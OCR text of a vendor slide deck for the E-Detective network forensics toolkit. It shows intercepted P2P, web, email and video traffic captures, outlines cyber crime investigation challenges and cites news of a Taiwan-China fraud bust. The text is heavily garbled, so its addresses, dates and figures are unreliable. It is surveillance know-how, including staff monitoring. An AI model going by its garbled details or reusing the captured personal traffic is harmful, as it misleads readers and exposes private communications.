Telnet [1] (9/10/2009 11:26:40 AM |00:0a:e4:0d:c0:d8 |182.188.1.190 0.0.0. (9710/2009 11:27:14 AM |Foxy 1.8.8.0 Jay-Z, Rihanna, Kanye 
= HTTP 8/10/2009 11:26:58 AM —|00:0a:e4:0d:cO:d8 192.168.1.190 0.0.0. 9/10/2009 11:26:58 AM BitTorrent ` Not Available 
P d 10/30/2009 11:04:00 AM 00:0a:e4:0d:c0:d8 | 192.168.1.180 0.0.0. 10/30/2009 11:04:00 AM Foxy 19.8.0 Jay-Z ft. Rihanna & Ka 
> 10/30/2008 11:04:00 AM | 00:Da:e4:Dd:cO:d8 |192.168.1.190 0.0.0. 04: | 98.0 Foxy.1.9 9 TC Setup e 


Source Destination Destination 
Port IP Port 


| | 

| 114.27.213.1 
[122.117.1624 
(11443.239.7 
|118.171.133.157 
1122.127.178.89 


Eremuan Damaia Avatari toc Punase at name.com (nj ca 866-890-5479) 
Dico $4388.00 Matis cam $3108.00 has 


TubAwtaben tan 


11:26:07 AM Ü 
11:26:10 AM Ü 


9219 
7587 
10369 
6939 
|7759 
10583 
13935 


Tra 
|1380 
1383 


(524745 
33284 
1687104 


Captured Time: 2009/09/10 (Thursday) 11:26 


Source MAC: 00:0a:e4:0d:cO:d8 
Source IP: 192.168.1.190 
Destination IP: 0.0.0.0 


Transfered File: 24 E&$$-beyonce-bday-01-feat. Jay Z - Deja Vu( {hi 48k) mp3 


Message Detail VVhois 


(Q BitTorrent CB CG) ¿ @ 


Last Activated Time: 2009/09/10 (Thursday) 11:26 


P2P Tool: Foxy 1.9.8.0 


Sample: HTTP (Content) 


4 Network Forensics Analysis Toolkit 
: File Edit View Case Management Tool Window Help 
LP 2 


Web Browsing 


= TELNET 384 Captured Time Source MAC Source IP Destination IP Web Server's Host Charset Label of Vveb Page 
Telnet [1] 6/15/2009 3:31:16 PM 00:0A:E4:0D:C0:D8 | 192.168.1.190 | 119.160.246.241 |tw. yahoo.com UTF-8 | Yahoo! ggf 
= HTTP 


FJ  B/15/2009 3:31:17 PM 00:0A:E4:0D:C0:D8 | 182.168.1.180 
FJ |8/15/2008 3:31: 24 PM 00:0A:E4:0D:C0:D8 | 192.168.1.190 
| O 8/15/2009 3:31: 33 PM (00:0A:E4:0D:C0:D8 | 192.168.1.190 
oO 8/15/2008 3:31: 55 PM 00:0A:E4:0D:C0:D8 | 192.168.1.190 
(8/15/2009 3:32: 31 PM (00:0A:E4:0D:C0:D8 |182.168.1.190 


124.108.103.241 ad yieldmanager.com UTF-8 UNKNOWN 
9843843428 — cayahoo.com IUTF-B Yahoo! Canada 
689.180.150.199 ` ca.news yahoo.com | UTF-8 | Montreal cyclists bare 
68.180.150.199  |ca.news yahoo.com |UTF-8 Naked activists ride o 
68.180.150.199  |ca.news yahoo.com Du | Yahoo! Canada News 


HTTP Content [580] 
HTTP Upload/Download 
Video Stream [B] 
Http Request [4310] 
= Other M 


Detailed Information 


A. 2009/05/15 (Monday) 15:31 


x SE 
182168. 
CUPIS: 


SourceCode 


User's IP Address: 192.168.1.190 Hostname Query 


Web Server's IP Address: 119.160.246.241 


Web Server's Hos Web Server's Hostname: tw.yahoo.com Hostnapa€ Query Whois 
-— E £ 
whois — == 


<meta http-equiv="Content-Type* content-"text/html; charset-utf-9'» 
‘<meta http-equiv-*expires" content-"-1"» «base href-http://tw rd yahoo.comireferuriha!1024/> 
title>Yahoo!a¥t2O<ititie> 
<script> 
ar YAHOO=window.YAHOO||}: YAHOO namespace-function( 1Y(if(! 1 1 Jength}retum null} var. 2- 1.split(" "; var _3=YAHOO; for(var i=(_2[0]=="YAHO0")?1:0;i<_2 length; ++i) 
- 3 200: 3- 3[ 2 retum _3; }: YAHOO.namespace('util"); YAHOO namespace('widget" | YAHOO .namespace('F p"), YAHOO namespace("TW Fp"). 
ar YIWFp = YAHOO TW Fp; 
if( typeof( Document}=='undefined' Met HTMLDocument]-'undefinect && (document. constructor) (YAHOO Fg. sf = 1; 
(AHOO cookie=(get function(n)(var v=" c= «document cookie*"" s-c indexOf(( ‘+n+'="));if(s>=0}{s+=n length*2;v-unescape(c substring(s,c indexOf(’;’ s)));}retum v;},setfunction(n \ 
a=arguments al=a length; document cookie-n**-* «v ((al» 2&&2[7]I-"*]?" expires="+ (typeof{a[2]}=="object"?a[2] toGMTString(): (new Date(a[2J' 1000)) toGMTString()).")** path" «((al»: 
STAT domain="+(al>4882/4]!="")?a[4} "yahoo.com"; 
ar ser-'htto.Jitw yahoo com/pamodule/spirit/ 


name.com + Google 


Every domain name now comes 
purpeses ort with select Google Apps FREE! 


Sample: HTTP Upload/Download 


4 Network Forensics Analysis Toolkit 


- File Edit View Case Management Tool Window Help 


Ts 


-P2P [B] 


=. TELNET ; 
z Captured Time 
Telnet [1] a eic 
3 HTTP 6/15/2009 4:32:47 PM 


6/15/2008 3:37:35 PM 


HTTP Content [580] 


Source MAC Source IP Destination IP 


D0:0E:AB:38:47:43 
D0:0A:E4:0D:CO0:D8 | 192.168.1.190 


182.188.1.33 |203.66.142.67 


217.20.127.141 


Web Server's Host 


(WWW wowtaiwan com.tw 
wan _mystercrowley.cam:80 


Transfered File 


Launcher t< 
Ejector_v1.0.zip 


HTTP Upload/Download 86/15/2008 3:37:41 PM 


00:0A:E4:0D: CO0:D8 | 192.168.1.190 


217.20.127.141 


www .mystercrowley.com 


Ejector_v1.0.zip 


Video Stream [6] 8/15/2008 3:38:27 PM 


00:0A:E4:0D:C0:D8 | 182.168.1.190 208.109.138.6 


wWww.citadel5.com 


gscalcBD.zip 


Http Request [4310] 
Other 


6/15/2008 3:38:27 PM 


00:0A:E4:0D:C0:D8 | 182.168.1.190 208.109.138.6 


www jps-development.cam 


gscalcBD.zip 


Captured Time 9999/06/15 (Monday) 16:32 


Source MAC:  00:0E:A6:38:47:43 


Source IP: 192.168.1.33 


Destination IP: 203.66.142.57 


Web Server's Host ` wan wowtaiwan.com.tw 


TYPE: Download 


Transfered File: Launcher t< 


Detailed Information 


00:0A:E4:0D: CO: D8 | 182.168.1.180 88.191.80.94 


User's IP Address: 182.168.1.33 
Web Server's IP Address: 203.66.142.57 


Web Server's Hostname: www wowtaiwan.cp 
WhO.IS 


(Info? can: 866-550-6479) 
emm Wetten ben M 


name.com + Google 


Every domain name now comes 
with select Google Apps FREE! 


www feedbackchat.com 


| Cr Ma p 


I< 


Sample: HTTP Video Streaming (FLV Format) 


43 Network Forensics Analysis Toolkit 


: File Edit View Case Management Tool Window Help 


Ë tlist LX 
P2P [6] ^ 


& TELNET ? s N Web Server's d Transfered Filg 
Telnet [1] $E Captured Time Source MAC Source IP Destination IP Host Transfered File Esirametla 
= HTTP | Wi 11/2/2009 9:21:50 AM |00:0E:46:55:EC:C9 |192.168.1.10. |pic.adver.com.bw |pic.adver.comtw — |HTTPVIDEO. sXaaaa flv | 


HTTP Content [590] 6/15/2009 3:50:38 PM 00:DA:E4:0D:C0:D8 192.188.1.180 203.66.48.38 — 203.66 48.38 |HTTPVIDEO. KKbaaa flv | 
HTTP Upload/Download (6/15/2009 3:53:43 PM 00:0A:E4:0D:C0:D8 (182.168.1.180 203.684845 — 2038564845 |HTTPVIDEO_2xcaaa flv | 


s (6/15/2009 3:53:45 PM 00:0A:E4:0D:C0:D8 |182.168.1.190 203.66.48.45 203.88 48.45 HTTPVIDEO. kldaaa flv 
sd " 6/15/2008 3:54:27 PM 00:0A:E4:0D:C0:D8 192.168.1.190 203.66.4840 — 2203854840 HTTPVIDEO CBdaaa flv 


6/15/2009 3:55:38 PM 00:0A:E4:0D:C0:D8 | 192.168.1.180 | 203.66 48 45 203.66 48 45 HTTPVIDEO Uveaaa flv 


Bee? Detailed Information 
| Captured Time TBM (Monday 0821 YZ 


User's IP Address: 192.168.1.33 
Web Server's IP Address: 203.66.142.57 


Web Server's Host pic.adver.com.tw 
Trim 8 


Transfered File: HTTPVIDEO  sXaaaa flv 


Whois 


Web Server's Hostname: www .wowtaiwan.com.tw Gstname Query | Whois | Gocble Map | 


WhO.IS 


na com i 


[E 


y (fD Google 


Video BETA 
"Ámetacafe 


name.com + Google 


Every domain name now comes 
with select Google Apps FREE! 


HTTP Request 


4} Network Forensics Analysis Toolkit 


: File Edit View Case Management Tool Window Help 


ia SCH ec d Source MAC Source IP Destination IP Web Server's Host Ed ses VW 
Video Stream [B] 6/15/2009 4:31:41 PM |00:0E:A6:39:47:43 |192.168.1.33 [2038544257 — www.wowtaiwan.com tw 
Http Request [4310] 6/15/2009 4:31:42 PM | 00:0E:A6:39:47:43 |192.168.1.33 2038644257 — www.wowtaiwan.com.tw 
=- Other 6/15/2009 4:31:52 PM DU DE AR 2047 A3 |182.158.1.33 203.66.142.57 ` www.wowtaiwan.com tw 
cea 6/15/2009 2:47:56 PM | 00:0A:E4:0D:C0:D8 192.168.1.190 72.14.203.104 — |relay.google.com 
6/15/2009 3:31:15 PM 00:0A:E4:0D:C0:D8 192.168.1.190 119.160.246.241 |tw. yahoo.com 
6/15/2009 3:31:18 PM _00:0A:E4:0D:C0:D8 | 192.168.1.190 124.108.103.241 ad yieldmanager.com 


User's IP Address: 192.168.1.33 


www wovvtaivvan.com tw Web Server's IP Address: 203.66.142.57 


Web Server's Host: 
Web Server's Hostname: www .wowtaiwan.com. tw 


| whois E 
= AJ! 


Whois ° 

«meta http-equiv="Content-Type" content="text/html; charset=utf-8"> || (nio? cat. 866-830-6479) 
<meta http-equiv-"expires" contentz"-1*» «base href=http.//tw.rd.yahoo.com/referurlhp/1024/> m$TT8800 eut 218800 M; 
<title>Yahoola¥tz'@</title> 
<script> 
ar YAHOO-window.YAHOO||(; YAHOO namespace=function(_1){ if(!_1||!_1 Jength}{return null;} var 2- 1.split("."; var _3=YAHOO; fd 
I- 3[ 2D]; 3- 3[ 2[i]].) return _3; YAHOO namespace("util HOO.namespace("widget"); YAHOO namespace("Fp");, YAHOO. nai 

ar YTWFp = YAHOO TW Fp; 


Gstname Query | Whois Goggle Map 


ndefined' && (document.constructor)) (YAHOO En. sf = 1; 
dexOf(( '+n+'=')y;if(s>=0)(s+=n length+2;v=unescape(c.subst| 
="")?" expires="+(typeof(a[2])=="object"?a[2] taGMTString() (new D4 


name.com + Google 


Every domain name now comes 
with select Google Apps FREE! 


Dr dor 
ar ser='http://tw.yahoo.com/pamodule/spirit/"; 


Free Text Search — Key Words Content Search 


43 Network Forensics Analysis Toolkit 


aa MIA Hip Request o POPS | -x 
ERR: E ` - - - à 
= E-Mail | Source IP Source MAC Destination IP Sender Receiver CC | 

POP3 [33] 8/10/2009 11:11:56 AM |192.168.1.190 |00:0a:e4:0d:cO:d8 |220.130.119.240 |decision te... | decision123... Hi, This is a... | 


wpa 9/10/2008 11:11:56 AM 192.168.1.190 00:0a:e4:0d:c0:d8 220.130.119.240 decision te... decision123... Hi, This is a... 

Gene 8/10/2008 11:11:56 AM 192.168.1.190 00:0a:e4:0d:c0:d8 220.130.119.24D decision te.. decision123.. Hi, This is a... 

WebMail(Send) [47] 8/10/2009 11:11:56 AM 192.168.1.190 |00:Da:e4:0d:cO:d8 |220.130.119.240 decision te... decision123... Hi, This is a... 

= CHAT 8/10/2008 11:11:56 AM 192.168.1.190 |00:0a:e4:0d:c0:d8 220.130.118.240 decision te. decision123.. Hi, This is a... 
I FER I Se ix š | rr F Pas Fm 


MSN [31 munimaan a BRESCH EEN PER a AA A Aaa 


Content VVhois Source Code 


Subject Hi, This is a test mail 38! 
Sender. decision test(àyam.com 
Receiver decision123@pchome.com.tw 
Datetime: 2009/09/10 (Thursday) 11:11 
Source MAC 00:0a:e4:0d:c0:d8 


Source IP 192.168.1.190 


Destination IP — 220.130.119.240 v 


Free Text Search — Search by Key Words 


Cyber Crime Investigation and Some 
Case Studies 


Globalized Crime Issue 


Borderless Internet makes crime behavior more globalized. Through the Internet and cloud 
computing, communication in swindler group can be enhanced and anonymous. Because of 
limitation of state authority and anonymity, it is really hard for state prosecutors and police to take 
investigation on the entire crime activities. 


= 2 — E 
Thailand Severe SÉ 
Google Taiwan 
Swindlers 


North Americo G 


ge 
China/HK e 


South Korea 


"k 
ei 
A 


Vietnom 


Japa Cloud Computing z Network Computing 
Through Internet, computers can cooperate with each 
other, or services are available more far-reaching 


Challenges faced 


@ By new technologies (like IP phones), it is 
hard to intercept their calls with existing 
equipment. We need professionals and 
suppliers to find the way out 


@ Looking for cross border cooperation or 
other related clues if no cooperation 


Hard to Find 
Foreign Proxy or 


@ VPN, Foreign Proxy as Jump Board for 
criminals may be hidden behind deeper in 
Internet 


Router as Jump 
Board 


Challenges faced 


Large Volume of | | | 
CDR, and Hard to @ Analyze data and find the key information 


Take Analysis by text mining and data warehousing 


WC SC @ CDR is for billing management of ISP, and we 
9 must find how it is happening and analyze the 


Data reason 


Hard to Track 
Calls with 
Dummy 
Accounts Dre 


@ Find source and links, and know the key 
point by technical assistance and help from 


Gap between Physical and Cyber Crimes 


Physical Crimes 


Aur, -Finance Record 
eJ CI - Interview ( Video ) 
| CDR, LI 


| *Informers 


-human : apprehend arrest 
| -others 


place : warrant, confiscate 


Different sources dealt by police: 
hard to get clue (don't know how to 
do it), and no way to trace! 


Crime side á > others : -human : 
(web or tool). (MENEEE® | excluded ollection & M IP tracking apprehend, 
non-Crime side |. s: ; i Finance Record ` | arrest 
( Social network ) ` # pes - CDR, LI | «place : warrant, 
—— men les confiscate 


( by Account 


Biggest Case: 
450 Nabbed in Largest Taiwan-China 
Fraud Bust 


RES A Ee SS Ae 1 A 15 188 


450 Nabbed in Largest Taiwan-China Fraud Bust 


Æ Channel NewsAsia - 450 nabbed i 


—— 


CIF V A http channelnewsasia.com/stories/afp asiapacific 


File Edit View Favorites Tools Help 


Favorites A Channel NewsAsia - 450 nabbed in largest Taiwa... Fü v> E) + C dm > Pages Safetyv Tools v €» 


ASIA PACIFIC s 
Home > 


SINGAPORE ASIA PACIFIC NEWS a AT 


WORLD 
E 450 nabbed in largest Taiwan-China fraud bust 
SPORT 7". 201018450 
TECHNOLOGY TAIPEI: About 450 people were arrested in Taiwan and China Wednesday in the largest 
joint anti-fraud operation launched by the two sides, the island's police said. 
ENTERTAINMENT 
More than 2,700 Chinese policemen and nearly 550 from Taiwan took part in coordinated 
HEALTH raids against scam rings on both sides of the Taiwan Strait, said the Criminal Investigation 
SPECIAL REPORTS wanu m Taipei 
Taiwan police arrested 121 suspects and confiscated more than 10 million Taiwan dollars 
EJIWFJGEJEJ (312,500 US) while 329 were rounded up by Chinese authorities, according to the bureau. 
YouRnews "This is the largest-ever joint operation to show our determination to fight crime," the 


bureau said in a statement. 


7 Day News Archive . ` . 
"Let this be a warning to criminal groups thinking they can get away by moving back and 


forth across the Taiwan Strait." 


Photos 1of1 lala 


Search 

According to the bureau, the suspects were accused of involvement in a variety of fraud 
schemes, including telephone and on-line auction scams, in which people paid money for 
goods they never received. 
In a different type of scam, they allegedly assumed fake identities such as prosecutors, 
judges or police officers, apparently to get people to reveal their bank account details. 

iPhone App 
Taiwan and China, which split in 1949 after a civil war, signed a joint crime-fighting and judicial assistance agreement last year amid 

EB BlackBerry App improving ties. 

Android A, 
š pp -AFP/wk 

Mobile News 

B RSS 

a eNewsletter 

Ë Facebook [A Twitter ZS Live (i Google Email M 
Done o Internet | Protected Mode: Off y v 100% e 


http://www.channelnewsasia.com/stories/afp_asiapacific/view/1077084/1/.html 


AFRA RAAR 


File Edit 


e Favorites 


E | http://www.cna.com.tw/ShowNews/Detail.aspx?pNewsID=201008250245&pType0=aCN&pTyp w 


View Favorites Tools Help 


EE + @ MERGAS. x Eise, 


4 
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> 
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l| 


d EG, 
lf |G IAR | HASA | SRB SSH | FR | ERES |English| Espafiol| 2010/08/26 16 


P Bing 


24 Ë 


^.taiwannews.com.tw/etn/news content.php?id-1356491&lang- eng news&cate ir D mt | X | [p Bing 


te | d http 


: File Edit View Favorites Tools Help 


a 
Published: 2010-08-25 07:09 PM ap B 
CBATERIEZSE EO ABA ^ CERDO AJ ` WI ER ` SPS ` SESE 
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8028451 À ° 


KEE BA 8848154 A GE EECH 
FERETE ° 


IE eg 


IRISL 8E rj oC g8186 À AMERA Seil: 
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TOP VIDEO 


BRET TETRERRSSHULLENOEESRRBE o RAA ETS ERR Bie hea. eR 
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@ Internet | Protected Mode: Off 


450 Nabbed in Largest Taiwan-China Fraud Bust 


* The suspects were accused of involvement in a variety 
of fraud schemes, including telephone and on-line 
auction scams, in which people paid money for goods 
they never received. 


** In a different type of scam, they allegedly assumed 
fake identities such as prosecutors, judges or police 
officers, apparently to get people to reveal their bank 
account details. 


* E-Detective systems are deployed in multiple locations 
in China and Taiwan to help the operation to track the 
suspects and preserve the evidences. 


http://www.channelnewsasia.com/stories/afp asiapacific/view/1077084/1/.html 
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Using E-Detective to Track Suspects 
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Play back of reconstructed VOIP file 
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E-Detective Other Reference Cases 2 
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Police arrest 99 from Taiwan, China for fraud Latest news 
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a Vietnam sets aside $153.9 min to train nuclear power 


[LI Ministry of Security police have arrested — 
and charged 99 people from China and s Vietnamese culture to be part of South Korea 
Taiwan in an international phone and museum 


Internet fraud scam that has fleeced 


Storm to hit central Vietnam 


apiece Landslide buries seven in northern Vietnam 


The arrestees, 76 from Taiwan and 23 
from China, were placed in custody 
between June 29 and July 6, police said 


House helpers get death, life sentence for murder 


On July 7, Major General Nguyen Duc Minh said Vietnam would extradite the 

arrestees because they have not turned up any Vietnamese victims. The 

international crew targeted Chinese banks and citizens, mostly in Jiangsu, Hanoi Millenium Annive rsay 
Anhui and Shanghai, he said 
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E-Detective Other Reference Cases 3 


* Company staffs are caught sending out valuable confidential 
information to rivals. 

* Information sent out includes confidential price list, tender 
information and contact database. 

% Information sent through personal Email - Yahoo Mail, Gmail 
etc. and through IM — Yahoo Messenger, Windows Live 
Messenger etc... 

«+ E-Detective is use to monitor staffs online behaviors, retain 
and preserve all Internet communication and protect the 
company confidential info and intellectual property. 
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Thank You ! 
Training & Practice is Key to Success! 
Presented by DG 
Decision Group 


decision@decision.com.tw 
www.edecision4u.com 


